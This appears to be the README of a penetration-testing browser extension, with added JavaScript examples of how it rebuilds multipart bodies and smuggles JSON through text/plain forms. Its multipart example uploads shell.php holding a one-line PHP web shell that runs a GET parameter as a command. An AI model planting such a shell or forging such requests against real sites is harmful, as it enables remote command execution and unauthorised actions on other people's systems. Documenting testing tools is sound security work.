# A browser extension for Penetration Testing

A browser extension for Penetration Testing.

Available on Chrome Web Store and Firefox Add-ons.

## Permissions

- `storage`
- `scripting`
- `webRequest`
- `declarativeNetRequest`
## Features

- Load
- Supported:
  - Auto Test
  - SQLi
  - XSS
  - LFI
  - SSRF
  - SSTI
  - Shell
  - Encoding
  - Hashing

## Shortcuts

Open DevTools (`F12` or `Ctrl + Shift + I`) to use the extension.

| Description | Shortcut |
|---|---|
| Load | Alt + A |
| Split | Alt + S |
| Execute | Alt + X |
| Mode | Alt + M |
## Multipart form data

After changing the enctype field to `multipart/form-data`, you can put your payload into the Body field, such as the following:

```
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--
```
The first line is taken as the boundary, and a form element is reconstructed to send your request. Therefore, the boundary actually sent will not be the same as the one you typed.
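The following is an added example, not the extension's own code, showing the reconstruction step just described: the first line of the typed body is taken as the boundary, the parts are parsed, and the same parts are re-serialised under a freshly generated boundary, which is why the boundary that reaches the server differs from the typed one. The sample body, the `----ExampleBoundary` token and the function names are constructed for this illustration.

```javascript
// Added example (not the extension's own code): parse a raw multipart body the
// way the page describes, taking the first line as the boundary, then
// re-serialise the parts under a fresh boundary. The re-serialised body is what
// a reconstructed form element ends up sending, so its boundary differs from
// the typed one.

// Parse a raw multipart/form-data body. Returns { delimiter, parts }, where
// delimiter is the first line (e.g. "------WebKitFormBoundary...") and each
// part has { name, filename, contentType, body }.
function parseMultipart(raw) {
  const lines = raw.replace(/\r\n/g, "\n").split("\n");
  const delimiter = lines[0].trim();
  if (!delimiter.startsWith("--")) {
    throw new Error("first line is not a multipart boundary");
  }
  const parts = [];
  let i = 1;
  while (i < lines.length) {
    // Header lines run up to the first empty line.
    const headers = {};
    while (i < lines.length && lines[i] !== "") {
      const colon = lines[i].indexOf(":");
      if (colon > 0) {
        headers[lines[i].slice(0, colon).trim().toLowerCase()] =
          lines[i].slice(colon + 1).trim();
      }
      i++;
    }
    i++; // skip the empty separator line
    // Body lines run up to the next delimiter line.
    const bodyLines = [];
    while (i < lines.length && !lines[i].startsWith(delimiter)) {
      bodyLines.push(lines[i]);
      i++;
    }
    const isClosing = i < lines.length && lines[i] === delimiter + "--";
    i++; // consume the delimiter line
    const disposition = headers["content-disposition"] || "";
    const name = (disposition.match(/\bname="([^"]*)"/) || [])[1] || "";
    const filename = (disposition.match(/\bfilename="([^"]*)"/) || [])[1];
    parts.push({
      name,
      filename,
      contentType: headers["content-type"],
      body: bodyLines.join("\n"),
    });
    if (isClosing) break;
  }
  return { delimiter, parts };
}

// Serialise parts under the given boundary token (without the leading "--").
function buildMultipart(parts, boundary) {
  let out = "";
  for (const p of parts) {
    out += `--${boundary}\r\nContent-Disposition: form-data; name="${p.name}"`;
    if (p.filename !== undefined) out += `; filename="${p.filename}"`;
    out += "\r\n";
    if (p.contentType) out += `Content-Type: ${p.contentType}\r\n`;
    out += `\r\n${p.body}\r\n`;
  }
  return `${out}--${boundary}--\r\n`;
}

// Constructed boundary generator; browsers generate their own random token.
function freshBoundary() {
  return "----ExampleBoundary" + Math.random().toString(36).slice(2, 14);
}

// Re-send path: parse what was typed, rebuild with a new boundary, and report
// both boundaries so the difference is visible.
function reconstructRequest(raw) {
  const { delimiter, parts } = parseMultipart(raw);
  const boundary = freshBoundary();
  return {
    typedBoundary: delimiter.slice(2),
    sentBoundary: boundary,
    contentType: `multipart/form-data; boundary=${boundary}`,
    body: buildMultipart(parts, boundary),
  };
}

// Constructed sample body (a harmless text file, not a real payload).
const SAMPLE_BODY = [
  "------WebKitFormBoundaryEXAMPLE",
  'Content-Disposition: form-data; name="user"',
  "",
  "alice",
  "------WebKitFormBoundaryEXAMPLE",
  'Content-Disposition: form-data; name="file"; filename="notes.txt"',
  "Content-Type: text/plain",
  "",
  "hello world",
  "------WebKitFormBoundaryEXAMPLE--",
].join("\r\n");

const rebuilt = reconstructRequest(SAMPLE_BODY);
console.log(rebuilt.contentType);
console.log(rebuilt.body);
```

The parser keys on the delimiter line rather than on a `Content-Type` header, which is exactly why a mistyped first line (or a body whose parts use a different boundary than its first line) cannot be forwarded as-is; anything the parser cannot attribute to a part is dropped before the rebuilt body is sent.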
## JSON

After changing the enctype field to `application/json`, you can put your payload into the Body field, such as the following:

```json
{
  "username": "admin",
  "password": "admin"
}
```
If your payload doesn't contain `=`, a dummy field or object is inserted into your JSON in order to post the data, such as the following:

```json
{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }
```
For more details, please visit "Posting JSON with an HTML Form".
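The following is an added example, not the extension's own code, showing why the dummy `=` member is needed. It assumes the `text/plain` form encoding rule from the HTML specification (each field is sent as `name=value` followed by CRLF): the JSON text is split at its first `=` into a field name and a field value, and the browser puts the `=` back when it encodes the form. When the text contains no `=`, a member whose value is `=` is appended so that a split point exists. The `4dxnzjzd5mi` key is reused from the page as a placeholder; the function names are constructed.

```javascript
// Added example (not the extension's own code): carry a JSON document in a
// text/plain form submission. A text/plain form encodes each field as
// name=value followed by CRLF (assumed rule, per the HTML form spec), so the
// JSON text is split at its first "=" into the field name and field value and
// the browser puts the "=" back. When the text has no "=", a dummy member
// whose value is "=" is appended so that a split point exists.

// Placeholder key taken from the page; the extension generates its own.
const DUMMY_KEY = "4dxnzjzd5mi";

// Return { name, value } for a single text/plain form field that re-forms
// `json` when encoded. Assumes `json` is a JSON object when the dummy member
// has to be added.
function splitJsonForTextPlainForm(json, dummyKey = DUMMY_KEY) {
  let text = json;
  if (!text.includes("=")) {
    // Rebuild the object with one extra member holding "=".
    const obj = JSON.parse(text);
    obj[dummyKey] = "=";
    text = JSON.stringify(obj);
  }
  const at = text.indexOf("=");
  return { name: text.slice(0, at), value: text.slice(at + 1) };
}

// The browser-side text/plain encoding (assumed): name=value, CRLF-terminated.
function encodeTextPlainForm(fields) {
  return fields.map((f) => `${f.name}=${f.value}\r\n`).join("");
}

// What a server sees if it parses the submitted body as JSON.
function roundTrip(json) {
  const field = splitJsonForTextPlainForm(json);
  return JSON.parse(encodeTextPlainForm([field]));
}

console.log(roundTrip('{"username": "admin", "password": "admin"}'));
console.log(roundTrip('{"query": "a=b"}'));
```

The submitted request carries `Content-Type: text/plain`, not `application/json`; the round trip only succeeds against a server that parses the body as JSON regardless of the declared type. Rejecting unexpected content types server-side is the usual check against requests built this way.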
This mode is implemented via the `fetch` API. It does its best to send a request exactly as you typed it. However, there are some limitations:

### Request

- The protocol version is fixed to `HTTP/1.1` in the editor, but the version actually used in a request is up to `fetch` behavior.
- `Connection`, `Cache-Control`, `Pragma`, etc.: these headers will be assigned a default value. For example, `Connection: keep-alive`, `Cache-Control: no-cache`.

### Response

- The protocol version is shown as `HTTP/1.1` even if the protocol version actually used is HTTP/2 or higher.

See also Chromium Code Search.
See `package.json` for details.